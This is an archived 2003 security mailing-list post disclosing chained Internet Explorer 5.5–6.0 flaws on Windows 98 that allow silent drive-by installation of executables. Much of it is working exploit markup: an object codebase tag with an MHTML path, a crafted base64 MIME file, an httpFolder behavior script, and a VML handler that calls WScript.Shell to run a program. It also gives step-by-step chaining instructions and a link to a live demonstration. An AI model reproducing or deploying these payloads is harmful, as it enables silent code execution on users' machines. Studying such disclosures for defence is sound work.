SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0

http-equiv_at_excite.com
Date: 05/04/03

  • Next message: Jason Coombs: "Free IIS Security Forensic Analysis E-Book"
    Date:         Sun, 4 May 2003 21:12:57 -0000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Sunday, May 4, 2003

    Silent delivery and installation of an executable on the target
    machine, default install of win98 and Internet Explorer with all
    patches to date. No client input other than viewing a web page:

    Mildly amused by the recent patching of the codebase saga spanning
    nearly 3 years now, we put on our thinking caps and come to the very
    simple, yet delicious conclusion:

    As below we are able to inject arbitrary html into the local computer
    zone thus bypassing the browser's security. Nevertheless the codebase
    exploits as detailed time and time again, now no longer function,
    returning the standard active x error or security warning.

    BUT !

    there is a very specific reason for that and to bypass it, we do like
    so:

    ----local.html----

    <object CLASSID="CLSID:55555555-5555"
    codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
    file://malware.cab">

    ----local.html----

    and where our:

    ---wecerr.txt---
    MIME-Version: 1.0
    Content-Location:file://malware.cab
    Content-Transfer-Encoding: base64

    TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA
    AAAAAA

    ---wecerr.txt---

    contains a "signed" cab file. The digital signature is our key.

    Provided the executable is signed, we are again able to install via
    the codebase object, from the local machine and without any prompts
    or warnings. Certainly we would not expect malware to be digitally
    signed out in the wild, but for what it is worth, we are back in
    business.

    Working Example

    http://www.malware.com/aha.html

    Caution:

    a) for demonstration purposes we use the ubiquitous flash file [.cab
    file] as it is both signed and benign and you are able to visually
    see the install:

    [screen shot: http://www.malware.com/aha.png 14KB]

    b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can
    take a short while to download:

    [screen shot: http://www.malware.com/ah.png 4KB]

    once downloaded, simply take the:

    ----local.html----

    <object CLASSID="CLSID:55555555-5555"
    codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
    file://malware.cab">

    ----local.html----

    and away you go.

    Notes:

    1. None

    End Call

    --
    http://www.malware.com
    Thursday, May 1, 2003
    The following represents a trivial yet elaborate method of injecting
    arbitrary html into the "My Computer" zone on win98 using the
    Internet Explorer series of browsers.
    The manufacturer, commonly known as "Microsoft" has a done a splendid
    job of battening down the hatches with many of the "quirky" behaviors
    associated with her best known product; Internet Explorer.
    Specifically:
    1. Microsoft Security Bulletin MS03-014 Cumulative Patch for Outlook
    Express (330994) see: http://www.securityfocus.com/bid/5473/
    2. Microsoft Internet Explorer Self Executing HTML File Vulnerability
    see: http://www.securityfocus.com/bid/6961
    this one is particularly fascinating as an 'unannounced' patch was
    crammed into Microsoft Security Bulletin MS03-008 - Flaw in Windows
    Script Engine Could Allow Code Execution (814078) of March 19, 2003
    for 2. above in a relatively quick fashion: Feb 25, 2003 to March 19,
    2003 whereby now the extracted executable is placed in the Temporary
    Internet File [TIF] and controlled by the browser security setting.
    Anyway:
    Internet Explorer enjoys a unique component called the 'Web Folder"
    component. This is a selectable component install with the original
    installation of the browser or can be added later on. This unique
    component allows for an assortment of web publishing and authoring
    conveniences often touted as useful "feature".
    But what it actually does, is create a nicely named file for us in a
    known location.
    Where:
    The Internet Explorer series 5 through 6 enjoy a related behavior to
    the so-called "Web Folder" component which allows us to point
    directly to one of these web folders and traverse it directly.
    However, should the folder not exist, an error message is generated
    and conveniently placed for us in the temp folder:
    So:
    This particular error message is nothing more than a server side 404
    error message which can be modified to suit our needs as we require.
    Commence:
    1. We first construct our trivial behavior to generate the error
    message like so:
    <body onload=malware() style="behavior: url(#default#httpFolder);">
     <script>
    function malware(){document.body.navigate
    ("http://www.microsoft.com");}
     </script>>
    What this will do is "probe" the target site for a webfolder, and if
    not found, create our error file in the temp folder as follows:
    [screen shot: http://www.malware.com/behave.png 4KB]
    2. We then take our multi-faceted Windows Media Player and construct
    a 0s url flip *.asf file and point that to our named file in our
    known location:
    <iframe src="temp.asf">
    URL: mhtml:file://C:\WINDOWS\TEMP\wecerr.txt
    Because the error file is nothing more than a text file, we need to
    include our own html and allow Internet Explorer to 'read' it.
    Previously numerous possibilities to allow for this existed,
    including <object data="" type="text/html>, databinding with
    dataformatas="HTML", dotting file extensions etc.  These now all
    appear to be patched.
    Good:
    But because we can craft our own error message on the server and
    point our trivial behavior to it, we simply construct our error
    message like so:
    ------wecerr.txt------
    MIME-Version: 1.0
    Content-Type: text/html;
    charset="Windows-1252"
    Content-Transfer-Encoding: 7bit
    <HTML xmlns:v = "urn:schemas-microsoft-com:vml">
    <STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>
    </head>
    <body bgcolor=blue onload=malware() style="behavior: url
    (#default#httpFolder);">
    <center><font size="24" color="red"
    face="arial">malware</font></center>
    <v:vmlframe
    style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px;
    HEIGHT: 200px"
    src =
    "C:\WINDOWS\Temp\wecerr.txt#malware"></v:vmlframe>
    <script>
    function malware(){
    document.body.navigate("http://www.microsofter.com");
    </script>
    ------wecerr.txt------
    What that will do is generate our simple text file in our temp
    folder, and by merely mhtml'izing our 0s url flip in our Media Player
    like so: mhtml:file://C:\WINDOWS\TEMP\wecerr.txt, Internet Explorer
    will open our text file in full html splendor.
    Where it gets particularly interesting is as follows:
    1. We place both our silly behavior and our iframe with 0s url flip
    on the same page
    2. You navigate to that, automatically our silly behavior generates
    our custom crafted error file and places it in our known location.
    Simultaneously, our Media Player automatically opens our 0s url flip
    *.asf and points to that same file.
    3. Because the Media Player is launched from the local machine [the
    physical player], it is able to navigate locally to the file vs.
    security measures currently in place to disallow referencing files
    from the internet directly to the local machine.
    4. What then happens is our *.txt file is conveniently html'ized, but
    again, because of security measures, the html contents are actually
    extracted and opened from within the TIF as a *.TMP file -- this in
    accordance with Outlook Express recently cumulated security patches.
    In this case, while it would appear that we are inside the local
    machine and outside the security restrictions, we are in fact unable
    to do anything at all.
    5. In order to defeat that we include a second file and scheme to
    then bypass that restriction. Our handy VML frame:
    <v:vmlframe
    style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px;
    HEIGHT: 200px"
    src =
    "C:\WINDOWS\Temp\wecerr.txt#malware"></v:vmlframe>
    Because there is no restriction on referencing a local file remotely
    [from the TIF as an extracted MIME file] with this method, we create
    a second wecerr.txt with a different custom crafted content:
    <xml xmlns:v = "urn:schemas-microsoft-com:vml">
       <v:rect id="malware"  fillcolor="red"
       style="position:relative;top:1;left:1;width:20;height:20"
    onmouseover="javascript:alert(document.location);var wsh=new
    ActiveXObject('WScript.Shell');wsh.Run('telnet.exe');''">
       </v:rect>
       </xml>
    6. This is automatically generated once our first mhtml'ized
    wecerr.txt is opened and it automatically overwrites the first,
    allowing our VML frame to be rendered.
    7. Now even with the MHTML file extracted and controlled by the TIF
    security settings, it is pointing back to the local machine and temp
    folder, and because it was originally extracted locally [from the TIF
    as an extracted MIME file], we are once again operating outside the
    security zone, in the "My Computer" zone and back to square one.
    [screen shot: http://www.malware.com/aces.png 11KB]
    Notes:
    1. None.
    End Call
    --
    http://www.malware.com
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    Delivery co-sponsored by IP3 Inc.
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    SECURITY QUESTIONS? We've got answers...Apply for a scholarship and become
    TICSA certified.
    Do not miss your opportunity to discover solutions to what our participants
    have identified as their top 5 IT Security Challenges. You will return to
    work better prepared to put into place an effective security strategy
    utilizing the latest security tools, bookmarks and URL's.
    <http://www.ip3seminars.com>
    oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
    

  • Next message: Jason Coombs: "Free IIS Security Forensic Analysis E-Book"

    Relevant Pages

    • SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0
      ... we are again able to install via ... Internet Explorer series of browsers. ... Microsoft Internet Explorer Self Executing HTML File Vulnerability ... This particular error message is nothing more than a server side 404 ...
      (Bugtraq)
    • [Full-Disclosure] SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0
      ... we are again able to install via ... Internet Explorer series of browsers. ... Microsoft Internet Explorer Self Executing HTML File Vulnerability ... This particular error message is nothing more than a server side 404 ...
      (Full-Disclosure)
    • [Full-Disclosure] SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0
      ... we are again able to install via ... Internet Explorer series of browsers. ... Microsoft Internet Explorer Self Executing HTML File Vulnerability ... This particular error message is nothing more than a server side 404 ...
      (Full-Disclosure)
    • Lockups continue
      ... There are no error messages when this occurs - the pc just freezes. ... icon that looks like 2 text pages to copy the error message and paste the ... Check Internet Explorer for any "extras" like third party toolbars that may ... after a clean install and wiping of my main drive. ...
      (microsoft.public.windowsxp.help_and_support)
    • Lockups continue
      ... There are no error messages when this occurs - the pc just freezes. ... icon that looks like 2 text pages to copy the error message and paste the ... Check Internet Explorer for any "extras" like third party toolbars that may ... after a clean install and wiping of my main drive. ...
      (microsoft.public.windowsxp.hardware)